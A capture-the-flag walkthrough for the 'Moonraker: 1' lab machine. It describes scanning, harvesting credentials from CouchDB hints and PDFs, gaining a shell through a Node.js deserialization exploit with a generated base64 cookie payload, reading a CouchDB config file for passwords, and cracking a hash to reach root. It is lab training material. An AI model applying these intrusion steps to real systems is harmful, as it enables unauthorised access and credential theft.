Moonraker: 1

Difficulty: Challenging

Posted by Admin on February 3, 2020

CTF link

You've received intelligence of a new Villain investing heavily into Space and Laser Technologies. Although the Villian is unknown we know the motives are ominous and apocalyptic.

Hack into the Moonraker system and discover who's behind these menacing plans once and for all. Find and destroy the Villain before it's too late!

Scan

Find and scan machine

nmap -A 192.168.2.104

After scanning, I see an open web port, let's see what is there.

When you go to a web page, a movie trailer for the Moon Rider is included. When the video ends, we get to the menu page.

Getting shell

After clicking on the bottom button we get to the Moonraker Elite Services page.

Below it will be a link to the Services Information Request page.

After filling in the html code from the image of the upper form, I click on the button and a post request is sent to the svc-processing.php file.

And redirect to http://192.168.2.104/svc-inq/svc-processing.php

I decided to check the logs and in a minute I found an file svc-processing.php.

http://192.168.2.104/svc-inq/salesmoon-gui.php

After clicking on the link in this file, I get to the Sales Admin Interface page.

http://192.168.2.104/raker-sales/index.html

Then I opened CouchDB and I see hints with which I can find out the password from the jaws account from CouchDB on port 5984.

Okey jaws girlfriend's name is dolly map dolly + x99 and get authorization data.

jaws:dollyx99

After authorization, I go to the links tab and see 4 entries with links.

http://192.168.2.104/cats/cats-gallery.html
http://192.168.2.104/surv-cam/recent.html
http://192.168.2.104/HR-Confidential/offer-letters.html
http://192.168.2.104/x-files/deep-space-findings.html

When I go on the link http://192.168.2.104/HR-Confidential/offer-letters.html, I see the Offer Letter Archive Backup page with .PDF files that contain important data.

In moonraker_hugo.pdf I find the password and login to log in to port 3000

hugo:TempleLasersL2K

Node.js is working on port 3000

After analyzing the page with burp suite, I understand that I need to use exploit deserialization node.js

https://www.exploit-db.com/docs/english/41289-exploiting-node.js-deserialization-bug-for-remote-code-execution.pdf

Using nodejsshell.py script I generate a payload for remote execution of exploit code.

https://github.com/ajinabraham/Node.Js-Security-Course/blob/master/nodejsshell.py

With burp decoder i encrypt it in base64 format.

Paste in the cookie form.

And I got a shell.

Way to the Hugo

At first I checked the home folder but didn’t find anything interesting there, but then when I checked the CouchDB directory I found out the details for the hugo account.

cat /opt/couchdb/etc/local.ini
hugo:321Blast0ff!!

Now connect via ssh and we hugo.

Destroy Moonraker system

In the mail folder I found a letter addressed to hugo which said about the new administrator passwords and also there hash from the old password. It's time to turn to john.

less /var/mail/hugo

And we get the root password.

cyber

We compare with the data from the letter and get a new password for root.

root:cyberVR00M

Now proceed to destroy the moonraker system.

Great job agent.

http://192.168.2.103/semaj-dnob/flag-finale-007-moon/